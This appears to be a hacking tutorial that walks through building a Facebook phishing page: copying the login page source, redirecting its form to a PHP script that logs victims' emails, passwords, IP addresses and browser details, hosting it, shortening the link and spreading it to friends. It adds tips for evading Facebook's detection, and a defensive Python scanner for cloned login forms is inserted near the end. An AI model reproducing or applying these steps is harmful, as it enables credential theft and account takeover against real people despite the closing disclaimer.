Phishing refers to stealing confidential data, mainly usernames and passwords, by sharing a link to a fake website that appears genuine but collects the data and reports it to the hacker. The main targets are social media and financial organizations.
- In a new browser tab open https://www.facebook.com/
- Right Click anywhere in blank and click
View Source/ Open Source
- Copy all by
- Paste in a blank new notepad file and save it as
- Now in the same Notepad window press Ctrl+F and find action="https://www.facebook.com/login.php?login_attempt=1"
- Replace everything between the quotes, so that action="https://www.facebook.com/login.php?login_attempt=1" becomes action="login.php"
- Now again save this file as Index.html.
- Now create a new notepad file.
- Copy the below PHP code to that as it is, – This will give you username, password, IP-Address, Browser Victim is using
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
file_put_contents("logs.html","Email: <b>$email</b> | Password: <b>$pass</b> | IP: <b>$ip</b> | User_Agent: <b>$ua</b> <br> n",FILE_APPEND);
- Save this as login.php.
- Now save a blank notepad file in same location and name it logs.html
- Now select all the files, along with the auto-saved Facebook folder you saved in step 1, and ZIP them.
- The next step involves registering an account with any free web host, or using any paid hosting you have, such as a dedicated server, which won't block you from hosting phishing, although it is illegal.
- Upload all the files to the root of public_html, or the folder of your choice, and extract them.
- The folder location you extract to is the address of your phishing website.
- Now copy your website link and use any URL shortener like goo.gl or bit.ly or others to shorten your URL.
- Distribute the shortened URL among friends and make it viral, or make your friends open it anyhow.
- Check your hosting for logs after they open it.
- Get the password and username.
- Done. Happy Hacking !!
NOTE: If you face the problem in uploading, comment or contact, I will write that.
- Saving Facebook page and Editing is easy but is very easily detected, so try writing code for a page that is similar but yet tempting to victim.
- Don't use login.php, use some uncommon name.
- You could upgrade your php script to include details like IP-address time and more
- Replacing all links on your fake login page with your local hosting would be great, as Facebook monitors redirects.
- In the header file try not to load Facebook from it and instead redirect to some blank page or custom page because Facebook warns user often if they are coming from a page not redirected by Facebook.
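Seen from the defending side, the form-action rewrite in the steps above leaves a checkable signal: a page that references the brand's domain while its password form submits to some other host. The Python check below is an added example, not part of the original page; the function names, the sample markup and the `login-help.example` host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class PasswordFormScanner(HTMLParser):
    """Record the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self.actions = []   # actions of forms holding type=password
        self._open = None   # [action, saw_password] for the form being parsed
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._flush()
            self._open = [a.get("action") or "", False]
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._open[1] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()
    def close(self):
        super().close()
        self._flush()       # tolerate markup that never closes the form
    def _flush(self):
        if self._open and self._open[1]:
            self.actions.append(self._open[0])
        self._open = None

def is_brand_host(host, brand_domains):
    # Exact match or true subdomain only; "facebook.com.other.example" does not count.
    return any(host == d or host.endswith("." + d) for d in brand_domains)

def find_cloned_login(page_url, html, brand_domains):
    """Return (action, host) for password forms on a page that references the
    brand but submits credentials to a host outside the brand's domains."""
    if not any(d in html.lower() for d in brand_domains):
        return []
    scanner = PasswordFormScanner()
    scanner.feed(html)
    scanner.close()
    resolved = [(a, urlparse(urljoin(page_url, a)).hostname or "") for a in scanner.actions]
    return [(a, h) for a, h in resolved if not is_brand_host(h, brand_domains)]

# Constructed samples: a copied page with a relative action, and the genuine form.
BRAND = ["facebook.com"]
CLONE = ('<a href="https://www.facebook.com/recover">Forgot?</a>'
         '<form action="login.php" method="post"><input type="text" name="email">'
         '<input type="password" name="pass"></form>')
GENUINE = ('<form action="https://www.facebook.com/login.php?login_attempt=1" method="post">'
           '<input type="password" name="pass"></form>')
print(find_cloned_login("https://login-help.example/fb/index.html", CLONE, BRAND))
```

A relative action such as `login.php` resolves against the URL the page was served from, which is why the copied page is flagged while the same markup served from the brand's own host is not.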
NOTE: Any such practice as above is illegal and leads to imprisonment. Only for educational purposes.